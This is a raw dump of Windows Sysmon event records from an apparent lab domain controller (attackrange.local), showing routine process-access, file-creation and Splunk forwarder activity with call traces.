12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-647C-6064-2C00-00000000AE01}2916NT 
AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.721{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.721{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.721{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-646A-6064-0B00-00000000AE01}8564048C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+7259e|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-647E-6064-4600-00000000AE01}40004004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.648{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-647E-6064-4500-00000000AE01}39883992C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program 
